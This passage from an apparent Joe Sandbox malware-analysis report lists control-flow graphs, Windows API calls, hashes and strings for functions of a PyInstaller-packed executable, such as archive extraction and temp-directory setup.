746 7ff757156c92-7ff757156c96 742->746 743->742 744 7ff757156c67-7ff757156c7c 743->744 744->742 745->720 746->745 748 7ff757156c9c-7ff757156ce1 CloseHandle CreateFileW 746->748 750 7ff757156ce3-7ff757156d11 GetLastError call 7ff757144e7c call 7ff757148660 748->750 751 7ff757156d16-7ff757156d2b 748->751 750->751 751->745
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                      • Instruction ID: d2a87462497e1bedd0edcbb72cfabecc98d7b2349ad78d872a3c35d0b57a9bf0
                                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                      • Instruction Fuzzy Hash: 2BC1F032B28A4989EF14EF68E4812AC7761F789BA8F890235DE1E573D4DF38D412C750

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,00007FF757138919,00007FF757133FA5), ref: 00007FF75713842B
                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF757138919,00007FF757133FA5), ref: 00007FF7571384AE
                                                                                                      • DeleteFileW.KERNELBASE(?,00007FF757138919,00007FF757133FA5), ref: 00007FF7571384CD
                                                                                                      • FindNextFileW.KERNELBASE(?,00007FF757138919,00007FF757133FA5), ref: 00007FF7571384DB
                                                                                                      • FindClose.KERNELBASE(?,00007FF757138919,00007FF757133FA5), ref: 00007FF7571384EC
                                                                                                      • RemoveDirectoryW.KERNELBASE(?,00007FF757138919,00007FF757133FA5), ref: 00007FF7571384F5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                      • String ID: %s\*
                                                                                                      • API String ID: 1057558799-766152087
                                                                                                      • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                      • Instruction ID: 5054880f2304959903ce4a8fd9f3be953fdf78c28b6ab2bd42b1237160253dc7
                                                                                                      • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                      • Instruction Fuzzy Hash: 27414E31A0C94E85EF70BB65B4842BAA360FBD5754FC80232D99D42A95EF2CD54BCB60

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1014 7ff757155e7c-7ff757155eb1 call 7ff757155588 call 7ff757155590 call 7ff7571555f8 1021 7ff757155eb7-7ff757155ec2 call 7ff757155598 1014->1021 1022 7ff757155fef-7ff75715605d call 7ff75714a900 call 7ff757151578 1014->1022 1021->1022 1027 7ff757155ec8-7ff757155ed3 call 7ff7571555c8 1021->1027 1033 7ff75715606b-7ff75715606e 1022->1033 1034 7ff75715605f-7ff757156066 1022->1034 1027->1022 1035 7ff757155ed9-7ff757155efc call 7ff75714a948 GetTimeZoneInformation 1027->1035 1037 7ff7571560a5-7ff7571560b8 call 7ff75714d5fc 1033->1037 1038 7ff757156070 1033->1038 1036 7ff7571560fb-7ff7571560fe 1034->1036 1046 7ff757155fc4-7ff757155fee call 7ff757155580 call 7ff757155570 call 7ff757155578 1035->1046 1047 7ff757155f02-7ff757155f23 1035->1047 1040 7ff757156073 call 7ff757155e7c 1036->1040 1041 7ff757156104-7ff75715610c call 7ff757155c00 1036->1041 1054 7ff7571560ba 1037->1054 1055 7ff7571560c3-7ff7571560de call 7ff757151578 1037->1055 1038->1040 1050 7ff757156078-7ff7571560a4 call 7ff75714a948 call 7ff75713c550 1040->1050 1041->1050 1052 7ff757155f2e-7ff757155f35 1047->1052 1053 7ff757155f25-7ff757155f2b 1047->1053 1060 7ff757155f37-7ff757155f3f 1052->1060 1061 7ff757155f49 1052->1061 1053->1052 1056 7ff7571560bc-7ff7571560c1 call 7ff75714a948 1054->1056 1071 7ff7571560e5-7ff7571560f7 call 7ff75714a948 1055->1071 1072 7ff7571560e0-7ff7571560e3 1055->1072 1056->1038 1060->1061 1062 7ff757155f41-7ff757155f47 1060->1062 1067 7ff757155f4b-7ff757155fbf call 7ff75715a4d0 * 4 call 7ff757152b5c call 7ff757156114 * 2 1061->1067 1062->1067 1067->1046 1071->1036 1072->1056
                                                                                                      APIs
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF757155EAA
                                                                                                        • Part of subcall function 00007FF7571555F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75715560C
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF757155EBB
                                                                                                        • Part of subcall function 00007FF757155598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7571555AC
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF757155ECC
                                                                                                        • Part of subcall function 00007FF7571555C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7571555DC
                                                                                                        • Part of subcall function 00007FF75714A948: RtlFreeHeap.NTDLL(?,?,?,00007FF757152D22,?,?,?,00007FF757152D5F,?,?,00000000,00007FF757153225,?,?,?,00007FF757153157), ref: 00007FF75714A95E
                                                                                                        • Part of subcall function 00007FF75714A948: GetLastError.KERNEL32(?,?,?,00007FF757152D22,?,?,?,00007FF757152D5F,?,?,00000000,00007FF757153225,?,?,?,00007FF757153157), ref: 00007FF75714A968
                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF75715610C), ref: 00007FF757155EF3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                      • API String ID: 3458911817-239921721
                                                                                                      • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                      • Instruction ID: 8ea658eaa1d11fddbe17c8a5b2dcaa24128d84ae7fd5307b4fd8cbdf750543c4
                                                                                                      • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                      • Instruction Fuzzy Hash: 71515A32A1864A86EB14FF26F881579E761FFC8784FC84135EA4D47695DF3CE4428B60
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                      • String ID:
                                                                                                      • API String ID: 2295610775-0
                                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                      • Instruction ID: c1e01d86818d335c0bb469ea42b276aa522818e67acd209552ea4b90c0f7aed6
                                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                      • Instruction Fuzzy Hash: A8F06822A1974987FBB0AF64B499776F350BBC4768F890335D96E02AD4DF3CD04ACA14

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 331 7ff757131950-7ff75713198b call 7ff7571345c0 334 7ff757131c4e-7ff757131c72 call 7ff75713c550 331->334 335 7ff757131991-7ff7571319d1 call 7ff757137f90 331->335 340 7ff7571319d7-7ff7571319e7 call 7ff7571406d4 335->340 341 7ff757131c3b-7ff757131c3e call 7ff75714004c 335->341 346 7ff7571319e9-7ff757131a03 call 7ff757144f08 call 7ff757132910 340->346 347 7ff757131a08-7ff757131a24 call 7ff75714039c 340->347 345 7ff757131c43-7ff757131c4b 341->345 345->334 346->341 352 7ff757131a45-7ff757131a5a call 7ff757144f28 347->352 353 7ff757131a26-7ff757131a40 call 7ff757144f08 call 7ff757132910 347->353 361 7ff757131a7b-7ff757131b05 call 7ff757131c80 * 2 call 7ff7571406d4 call 7ff757144f44 352->361 362 7ff757131a5c-7ff757131a76 call 7ff757144f08 call 7ff757132910 352->362 353->341 375 7ff757131b0a-7ff757131b14 361->375 362->341 376 7ff757131b35-7ff757131b4e call 7ff75714039c 375->376 377 7ff757131b16-7ff757131b30 call 7ff757144f08 call 7ff757132910 375->377 382 7ff757131b6f-7ff757131b8b call 7ff757140110 376->382 383 7ff757131b50-7ff757131b6a call 7ff757144f08 call 7ff757132910 376->383 377->341 391 7ff757131b8d-7ff757131b99 call 7ff757132710 382->391 392 7ff757131b9e-7ff757131bac 382->392 383->341 391->341 392->341 395 7ff757131bb2-7ff757131bb9 392->395 397 7ff757131bc1-7ff757131bc7 395->397 398 7ff757131bc9-7ff757131bd6 397->398 399 7ff757131be0-7ff757131bef 397->399 400 7ff757131bf1-7ff757131bfa 398->400 399->399 399->400 401 7ff757131bfc-7ff757131bff 400->401 402 7ff757131c0f 400->402 401->402 403 7ff757131c01-7ff757131c04 401->403 404 7ff757131c11-7ff757131c24 402->404 403->402 405 7ff757131c06-7ff757131c09 403->405 406 7ff757131c2d-7ff757131c39 404->406 407 7ff757131c26 404->407 405->402 408 7ff757131c0b-7ff757131c0d 405->408 406->341 406->397 407->406 408->404
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF757137F90: _fread_nolock.LIBCMT ref: 00007FF75713803A
                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF757131A1B
                                                                                                        • Part of subcall function 00007FF757132910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF757131B6A), ref: 00007FF75713295E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                      • Opcode ID: 49394c2bb60a287dea76626521b8c13cd78a213fc93cc28346ca85f2621f52a7
                                                                                                      • Instruction ID: ea3f51e1df8aaa259574dbd60e10a69ee4bb742286a7ef70ece2225d76823a1a
                                                                                                      • Opcode Fuzzy Hash: 49394c2bb60a287dea76626521b8c13cd78a213fc93cc28346ca85f2621f52a7
                                                                                                      • Instruction Fuzzy Hash: 9381A271A18A8E86EF20FB24F0416B9A3A1EFC5784FC84435D98D47785EE3CE5478B60

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 409 7ff757131600-7ff757131611 410 7ff757131637-7ff757131651 call 7ff7571345c0 409->410 411 7ff757131613-7ff75713161c call 7ff757131050 409->411 418 7ff757131682-7ff75713169c call 7ff7571345c0 410->418 419 7ff757131653-7ff757131681 call 7ff757144f08 call 7ff757132910 410->419 416 7ff75713162e-7ff757131636 411->416 417 7ff75713161e-7ff757131629 call 7ff757132710 411->417 417->416 426 7ff7571316b8-7ff7571316cf call 7ff7571406d4 418->426 427 7ff75713169e-7ff7571316b3 call 7ff757132710 418->427 434 7ff7571316f9-7ff7571316fd 426->434 435 7ff7571316d1-7ff7571316f4 call 7ff757144f08 call 7ff757132910 426->435 433 7ff757131821-7ff757131824 call 7ff75714004c 427->433 440 7ff757131829-7ff75713183b 433->440 438 7ff757131717-7ff757131737 call 7ff757144f44 434->438 439 7ff7571316ff-7ff75713170b call 7ff757131210 434->439 450 7ff757131819-7ff75713181c call 7ff75714004c 435->450 447 7ff757131739-7ff75713175c call 7ff757144f08 call 7ff757132910 438->447 448 7ff757131761-7ff75713176c 438->448 445 7ff757131710-7ff757131712 439->445 445->450 463 7ff75713180f-7ff757131814 447->463 452 7ff757131802-7ff75713180a call 7ff757144f30 448->452 453 7ff757131772-7ff757131777 448->453 450->433 452->463 456 7ff757131780-7ff7571317a2 call 7ff75714039c 453->456 464 7ff7571317da-7ff7571317e6 call 7ff757144f08 456->464 465 7ff7571317a4-7ff7571317bc call 7ff757140adc 456->465 463->450 470 7ff7571317ed-7ff7571317f8 call 7ff757132910 464->470 471 7ff7571317be-7ff7571317c1 465->471 472 7ff7571317c5-7ff7571317d8 call 7ff757144f08 465->472 478 7ff7571317fd 470->478 471->456 475 7ff7571317c3 471->475 472->470 475->478 478->452
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                      • Opcode ID: 875ab1c0738739cbbd8e618f16dc370b1cfe7653178c4e5cea938e1883ffd5f0
                                                                                                      • Instruction ID: 5ba07e9b39560f3641c87dc0ece4f5a86605daeadd87c62c10f091ebe6dcade5
                                                                                                      • Opcode Fuzzy Hash: 875ab1c0738739cbbd8e618f16dc370b1cfe7653178c4e5cea938e1883ffd5f0
                                                                                                      • Instruction Fuzzy Hash: AF51BB61A18A4F82EE24BB26B5015B9A3A1BFC1794FCC4535EE0C07792EE3CE5479720

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF757133CBB), ref: 00007FF757138704
                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF757133CBB), ref: 00007FF75713870A
                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00007FF757133CBB), ref: 00007FF75713874C
                                                                                                        • Part of subcall function 00007FF757138830: GetEnvironmentVariableW.KERNEL32(00007FF75713388E), ref: 00007FF757138867
                                                                                                        • Part of subcall function 00007FF757138830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF757138889
                                                                                                        • Part of subcall function 00007FF757148238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF757148251
                                                                                                        • Part of subcall function 00007FF757132810: MessageBoxW.USER32 ref: 00007FF7571328EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                      • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                      • Instruction ID: abd1dd7e7ff3fea09394981cf15a11b2314c1ef2d4fec042a9ba55b9dec6043c
                                                                                                      • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                      • Instruction Fuzzy Hash: 1541BE11A1964E84FE24BB29B9562B99292AFC47C4FCC0131ED4D477DAEE3CE5478720

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 756 7ff757131210-7ff75713126d call 7ff75713bd80 759 7ff757131297-7ff7571312af call 7ff757144f44 756->759 760 7ff75713126f-7ff757131296 call 7ff757132710 756->760 765 7ff7571312b1-7ff7571312cf call 7ff757144f08 call 7ff757132910 759->765 766 7ff7571312d4-7ff7571312e4 call 7ff757144f44 759->766 779 7ff757131439-7ff75713144e call 7ff75713ba60 call 7ff757144f30 * 2 765->779 771 7ff757131309-7ff75713131b 766->771 772 7ff7571312e6-7ff757131304 call 7ff757144f08 call 7ff757132910 766->772 775 7ff757131320-7ff757131345 call 7ff75714039c 771->775 772->779 785 7ff75713134b-7ff757131355 call 7ff757140110 775->785 786 7ff757131431 775->786 793 7ff757131453-7ff75713146d 779->793 785->786 792 7ff75713135b-7ff757131367 785->792 786->779 794 7ff757131370-7ff757131398 call 7ff75713a1c0 792->794 797 7ff75713139a-7ff75713139d 794->797 798 7ff757131416-7ff75713142c call 7ff757132710 794->798 799 7ff757131411 797->799 800 7ff75713139f-7ff7571313a9 797->800 798->786 799->798 802 7ff7571313ab-7ff7571313b9 call 7ff757140adc 800->802 803 7ff7571313d4-7ff7571313d7 800->803 807 7ff7571313be-7ff7571313c1 802->807 805 7ff7571313d9-7ff7571313e7 call 7ff757159e30 803->805 806 7ff7571313ea-7ff7571313ef 803->806 805->806 806->794 809 7ff7571313f5-7ff7571313f8 806->809 812 7ff7571313cf-7ff7571313d2 807->812 813 7ff7571313c3-7ff7571313cd call 7ff757140110 807->813 810 7ff7571313fa-7ff7571313fd 809->810 811 7ff75713140c-7ff75713140f 809->811 810->798 815 7ff7571313ff-7ff757131407 810->815 811->786 812->798 813->806 813->812 815->775
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                      • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                      • Instruction ID: 3f3a36635aa998550b62a1596cdfe404f5dcf3646d014b683a435eb89baf4098
                                                                                                      • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                      • Instruction Fuzzy Hash: FC51AC22A18A4E85EE24BB16B4403BAA291BFC5B94FDC4135ED4D477D5EF3CE5438720

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF75714F0AA,?,?,-00000018,00007FF75714AD53,?,?,?,00007FF75714AC4A,?,?,?,00007FF757145F3E), ref: 00007FF75714EE8C
                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF75714F0AA,?,?,-00000018,00007FF75714AD53,?,?,?,00007FF75714AC4A,?,?,?,00007FF757145F3E), ref: 00007FF75714EE98
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                      • Instruction ID: 80210add9a05a898958fbf2c101daa8080d8fb12fd8b57f9f3716d9a5fa9eb7c
                                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                      • Instruction Fuzzy Hash: 3741F421F19A0A81EE15EB16B900975A292BF89BD0FCC4139DD1D67784FF3CE44B8328

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF757133804), ref: 00007FF7571336E1
                                                                                                      • GetLastError.KERNEL32(?,00007FF757133804), ref: 00007FF7571336EB
                                                                                                        • Part of subcall function 00007FF757132C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF757133706,?,00007FF757133804), ref: 00007FF757132C9E
                                                                                                        • Part of subcall function 00007FF757132C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF757133706,?,00007FF757133804), ref: 00007FF757132D63
                                                                                                        • Part of subcall function 00007FF757132C50: MessageBoxW.USER32 ref: 00007FF757132D99
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                      • Instruction ID: 4c8707b8379381ea4a6eb9110f832f47dd54184567279627ce8521366850e9a3
                                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                      • Instruction Fuzzy Hash: FC21A661F1C64E81FE24BB29F8053B6A251BFC5385FC80132D55E866D5EE2CE107C724

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
